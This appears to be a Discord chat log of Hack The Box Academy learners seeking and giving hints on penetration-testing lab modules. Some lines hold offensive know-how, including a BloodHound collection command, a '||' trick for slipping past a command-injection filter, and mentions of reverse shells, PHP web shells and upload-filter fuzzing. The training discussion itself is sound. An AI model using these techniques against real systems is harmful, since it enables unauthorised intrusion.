
Did you try checking the DC?

wide narwhal
#

Yes the question is asking to connect to DC1 with some creds, so I'm looking from there

#

About Kerberoasting there were a lot of logs so I was thinking okay maybe I missed something somehow, but for the "Credentials in Object Properties" there were not so much events and going one by one, I couldn't find "bonni" as stated in the question

safe star
#

did you filter 4771 and account name?

wide narwhal
#

yes

#
PS C:\Users\htb-student> Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4771 and */EventData/Data[@Name="TargetUserName"]="bonni"'

Get-WinEvent : No events were found that match the specified selection criteria.
At line:1 char:1
+ Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4771 an ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (:) [Get-WinEvent], Exception
    + FullyQualifiedErrorId : NoMatchingEventsFound,Microsoft.PowerShell.Commands.GetWinEventCommand
#

Same thing by searching manually with the gui

safe star
wide narwhal
#

Alright, thanks for your time. I'll try to reload the machines tomorrow and see

obtuse veldt
urban elk
#

oh man can't wait for the bots to start scamming eachother

safe star
#

😭

urban elk
#

would love to be a fly on that virtual wall, watching an endless loop of "ok, before I can do that I need you to send a $100 amazon gift card to this address." "Sure! Before I can do that, I need you to send a $100 amazon gift card to this address." "OK, I'm on it. Before I can do that..."

viral crypt
#

✌️

clever topaz
#

anyone know why?

urban elk
#

you need a break :)

#

--boundhound

dapper moth
clever topaz
urban elk
#

--bloodhound is a valid command, yeah

limber river
clever topaz
#

LMAO my bad HAHAHA

limber river
#

someone need to take a nap

urban elk
#

Freud would have something to say about this, probably

wispy halo
#

Hello! I would like to know if the activities in NTFS vs. Share Permissions section in Windows Fundamentals can be done with the vpn in my attacker machine alone without the pwnbox?

clever topaz
#

yea been doing whole day

#

mbmb

wispy halo
#

Same goes to my own attach machine I can't list the shares via smbclient

tired atlas
#

if I'm using pwnbox how would i download the resources under the module

#

nvm

#

just emailed it to myself

safe star
#

Email?

#

Just copy the download link

hushed rivet
#

the pwnbox has internet @tired atlas

atomic burrow
#

Yes

#

I got that

high reef
#

anyone available for help with this assessment

clever topaz
#

nxc ldap IP-u 'USER' -p 'PASS' --bloodhound --collection All --dns-server IP
why doesnt this work? is it because the internal host can't connect back to me?

#

have u tried the old version?

#

im using ligolo btw

tired atlas
midnight galleon
#

is there a way to PrivEsc to root if you know open ldap admin creds?

limber river
rustic sage
#

why does HTB say Linux Privilege Escalation takes 8 hours?

#

It got 28 sections..

clever topaz
limber river
clever topaz
#

Okay thank you for the info, been looking for other data collector but didn’t notice rusthound

mighty halo
#

damn

high reef
#

I'm able to see access the internal server for the injection skill assessment, having issues reading files. any help greatly apprecaited

fossil jacinth
#

@torn skiff zip the folder and certutil maybe ?

elder kraken
#

Hey, I have a question. I feel like my learning level isn't increasing. I've finished the htb web course and I'd like to practice on the web but I've noticed that without a write-up I can't finish a box. Do you have any advice for me in terms of methodologies or is it just try harder?

winter schooner
#

Can anyone help me on command injections skills assessment?

I think i have found the right spot to inject, as I'm getting the "Malicious File" Error.

And i tried many different ways to be able to get the flag, but to no success. I think the main issue is I couldn't escape to the subshell so the command can be executed, so its being recognized as just regular input. A nudge would be helpful.

sly kelp
winter schooner
winter schooner
elder kraken
winter schooner
elder kraken
#

All the modules. I finished in december.

winter schooner
elder kraken
primal eagle
#

So if you notice

#

You get an error when running anything

#

this means you need the OR statement

#

|| is or in bash, so try that 😉 No malicious should be found

winter schooner
winter schooner
primal eagle
#

sure

#

accept friend request

#

then you can dm me

errant bane
#

Hey all, in the AD Enumeration and Attacks > Kerberoasting - from Windows module

The credentials provided for the lab portion are not working for me. Even tried to confirm with smbclient but still getting NT Status Logon Failure. I've tried to reset the box as well but nothing. Any advise would be appreciated!

cinder cargo
#

Hey folks, on the fundamental module “macOS fundamentals” how much do we need access to a Mac box? Like - I get that it’s good to have one to follow along and practice on, but can you complete the module without access to a box?

I’m trying to get by on cubes I earn from completing modules so I don’t want to start a module if I can’t earn the cubes back from it.

high reef
hallow kiln
errant bane
hallow kiln
fair yacht
#

wth

#

whats next? fax it? xddd

errant bane
#

its a windows box

hallow kiln
errant bane
hallow kiln
#

What's your command though, for either of those things?

analog dock
#

What error

#

And can you show the command you’re using

jolly widget
#

Pwnbox is not working.. local VPN is not working, whats happenning??

analog dock
#

Contact support

fading basin
errant bane
errant bane
winter schooner
#

Can anyone help me on file Uploads Skills assessment? I'm able to upload php web shell, but don't know where its going. So now I'm trying to leak upload.php file source code, but when I try to use the .svg file to do it it just gives me the base64 of the command not source code so I need a nudge.

winter schooner
limpid cedar
#

Hello! I was doing SQLmap Attack Tuning section and when i got stuck i looked at the hint. I can't understand what i was supposed to try doing to understand that i need to set preffix this way?

ornate smelt
#

Hello guys

#

I am doing attacking common applications

#

In the part of attacking tomcat

gilded plaza
ornate smelt
#

The first question was what is a valid username and I wrote it is Tomcat

#

And what is the password question?

#

I tried everything

#

But nothing worked

#

I decided to go to the walk through

#

The password was root sadglas sadglas

#

I answered the question with that password and it worked

#

But when I tried to login with it it didn't work

#

I restarted the machine but same issue

#

What the problem I spent 2 hrs

#

On a silly target

opal nexus
ornate smelt
#

I did that

#

It is so frustrating

winter schooner
limpid cedar
#

I don't like the idea of simply giving the anwer. They could've provide the method to get it by your own at least.

hard matrix
midnight galleon
#

can someone explain to me wtf

hard matrix
#

revshell using openssl

midnight galleon
#

yeah, it isn't, reversing

hard matrix
#

oh good point

midnight galleon
#

it still executes with john's token even tho I am running openssl with sudo

ancient niche
#

Good Afternoon people. Someone can help me with this? i cannot run this command and i don't know because

ancient niche
#

what

midnight galleon
#

is that processhacker in tools?

#

is it a file or directory?

ancient niche
#

cmd

midnight galleon
#

check if it is there, could be a typo

hard matrix
#

potentially it is ProcessHacker.exe

#

judging by the names of the other tools in the sheet

rustic sage
#

anybody else working on the Active Directory Enumeration & Attacks module?

its saying "For the portion of this section that requires interaction from a Linux host (mssqlclient.py and evil-winrm) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!"

when I try to ssh to 172.16.5.225 from the RDP machine, its not accepting the
credentials.

ancient niche
hard matrix
#

then dir C:\Tools

#

like sora said originally

rustic sage
#

support asked for a screenshot, which I sent them and then my request was closed stating they cannot help with content questions

#

not sure if theres anything wrong with the command?

quiet trout
winter schooner
ancient niche
winter schooner
quiet trout
#

ok thx

acoustic owl
hard matrix
# rustic sage

for what its worth i remember when i did the AD modules the ssh password changes around a lot

#

make complete sure you're using the correct password and not assuming its the same one from previous sections

ancient niche
hard matrix
#

C:\Tools\ProcessHacker is not a command

ancient niche
#

look at this

acoustic owl
quiet trout
# winter schooner It requires the correct Scan type you dont gotta do -T0

can you maybe provide a hint thats a little more helpful than whats on offer in the description and hint, the hint mentions a service "our client was talking about" but in the lab descirption it never mention any details about what exactly that is except for a vague "specific services must be changed, and the communication for the provided software had to be modified."

acoustic owl
#

it is a path, not a command

dark hedge
#
cd C:\Tools
ProcessHacker.exe
hard matrix
#

.\ProcessHacker.exe

ancient niche
dark hedge
#

oh, it's a dir

hard matrix
#

so nav to that directory and dir it to see whats in that file location
i dont understand the disconnect

ancient niche
#

that is true😅

quiet trout
#

i dont want to get "banned", maybe i need to take it slow and attempt to enum the ports first? dunno i guess il get banned

hard matrix
#

cd C:\Tools\ProcessHacker
dir

winter schooner
quiet trout
#

oh i see ok

#

that last bit will come in handy

rustic sage
#

does anyone know how to boost my soundcloud?

acoustic owl
rustic sage
acoustic owl
rustic sage
#

oh well moving on

hard matrix
#

what were you doing wrong exactly?

quiet trout
#

lol thats a new one

#

HTB Soundcloud box when?

midnight galleon
dark hedge
#

that's just BlackSky

ancient niche
#

this i don't work

acoustic owl
hard matrix
ancient niche
hard matrix
#

😅

winter schooner
quiet trout
#

you're using the php extension or whatever they call it

#

thats required. copy output and pipe to xxd -d b64 or whatever the cmd is

acoustic owl
quiet trout
#

wait, @winter schooner link the exact lab you're on i think ive done this one can give some better help than that (it might be wrong)

ancient niche
quiet trout
#

@winter schooner remember in the previous sections when you used intruder to check for extensions allowed? do that (again if needed) svg is not the right route

fathom pendant
quiet trout
#

check your output as the error codes differ (may not be this lab but this will be useful now or in the future)

#

(future labs of this same section)

acoustic owl
fathom pendant
#

Idk how you're still struggling with basic windows

ancient niche
#

ohh myyy goood hahahaha

#

sorryyyy

winter schooner
hard matrix
quiet trout
# ancient niche sorryyyy

keep an eye on your terminal contexts, ls while can be used in powershell (not cmd.exe) is just an alias of ls (if memory serves me correctly) just use dir in windows

hard matrix
#

i.e. there's two upload buttons, maybe that helps you

midnight galleon
quiet trout
fathom pendant
fathom pendant
foggy monolith
#

Kerberos Attacks § Unconstrained Delegation - Users
Printer bug is being triggered but not getting any tickets back ― any idea what the problem is here?

midnight galleon
ancient niche
fathom pendant
quiet trout
#

i think you need to enum to find the upload dir

#

@winter schooner ^

fathom pendant
#

Indeed

winter schooner
quiet trout
#

upload.php should be handling the actual upload, you need to enum to find the location its being stored if memory serves me correctly

hard matrix
# winter schooner

yeah you have to find upload.php
fuzz using burp seeing what file types are accepted

hard matrix
fathom pendant
#

Haven't done this module

quiet trout
hard matrix
#

@winter schooner the modules should detail how to fuzz accepted file types - do that and get the right combination of parameters in your request

quiet trout
#

i have to step away for a bit @winter schooner if you arent done when i get back in an hour or so ill be able to give more specific help

hard matrix
#

@winter schooner on top of that i dont think you want:

'''xml

in your request

ancient niche
#

still not working

winter schooner
#

Im kind of sick of this module, im going to do the other ones ahead and come back to it.

hard matrix
#

there should be a wordlist somewhere in /usr/share/wordlists for 'common filetypes' or something like that

acoustic owl
hard matrix
#

this is in the module somewhere, pulled from notes:
@winter schooner

#

dm if you still struggle '

foggy monolith
heavy fable
#

someone who has carried out the assessment || from NoSQLi, help please

old wren
#

don't ask to ask, just ask

tranquil wren
#

Hello, I am doing the Footprinting Easy Lab, I skipped the DNS and logged in with the ceil ID over ftp, i used ls -al, but I only see this <attached> am I missing something?

ancient niche
#

guys thank you so much for your help. I greatly appreciate your patience with me 🙂

old wren
foggy monolith
slow osprey
#

in the Shells and Payloads module for the Reverse Shells practice questions, I'm simply using the windows one liner reverse shell command from the section, and I get a big error output-

#

has anyone had this before? this is different from the "malicious command detected from antivirus etc" error from the section

foggy monolith
#

The base64-encoded payload — PowerShell #3 (Base64) — from revshells.com worked far better than what's in the module when I did it.

autumn pilot
#

Run it through command prompt

safe star
#

I’m talking about the zip file link

#

You can just wget <link>

tranquil wren
foggy monolith
fathom pendant
safe star
#

Unless it’s a file not in the resources

foggy monolith
#

Don't you need to be authenticated with your HTB account to access the resources? That presents a bit of a problem for using command line tools to download the resources directly.

Sure, you could probably spin up python3 -m http.server in your Downloads directory after accessing the resources and then wget it from the PwnBox after that, but that would only work with port forwarding enabled on your home network.

slow osprey
#

do you know why that may be? why command prompt works on Windows sometimes vs powershell, when it's a powershell command I thought?

foggy monolith
#

Alright, fair enough then

fathom pendant
#

Anything from the resources button can just be wget

tranquil wren
#

nevermind

fathom pendant
#

It's mostly for user convenience

tranquil wren
#

i got it

#

sorry to waste you alls time

foggy monolith
#

Then here's a new answer for @tired atlas: right-click on the resource you need on the PwnBox, click "Copy Link" in the context menu, then "wget <Ctrl+Shift+V>" in a PwnBox terminal

fathom pendant
foggy monolith
#

I never used the PwnBox for anything that required those resources which is why this stuff is new. Used Linux-on-bare-metal instead.

ruby light
#

is anyone that works for HTB in here

fathom pendant
ruby light
# fathom pendant If you need staff reach out to support

they do not provide any support i cannot get past this error i have been working on this for 2 days now ad decrypt
40B791FCF97F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:124:
Decrypted value:
Salt: 25223

foggy monolith
#

What module?

fathom pendant
#

In your count

ruby light
fathom pendant
#

That error means the decrypt function doesn't have the right salt btw

fathom pendant
ruby light
#

i am using all the information in the module

fathom pendant
#

Revisit your loop function then

ruby light
#

since i am new to this i stillhave to look up everything

#

i am not sure what i changed i get this, and i have seen this one before

safe star
ruby light
#

i doudt after this i will get a job in the IT field just want to finish this,

safe star
#

Just remove the -n from echo and also use wc -m instead

#

You were right on yesterday

fathom pendant
#

^

#

We were literally right there

ruby light
#

i know that i just dont get stuff my brain is not like it use to be i have a TBI

fathom pendant
#

Not gonna find a pity party here dude. You gotta learn how to cope with it while learning, like taking excessive notes

ruby light
#

i think i found the right code from yesturday and removed the -n i am still getting bad magic number and a blank decrypted flag

bright shore
#

Currently stuck on Pass the Ticket (PtT) from Linux on module Password Attacks where I'm trying to import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I located Julio's Kerberos ticket in /tmp and set KRB5CCNAME to export it. However, when I ran klist, it didn’t recognize the ticket cache. I also tried using smbclient to access \DC01\julio, but authentication failed despite the ticket file being present and permissions set correctly.

ancient niche
#

thank you guys

flint palm
#

Hello Guys if anyone has done Wi-Fi Penetration Basics how did you connect to HTB-Corp Wifi network in Connecting to Wi-Fi Networks?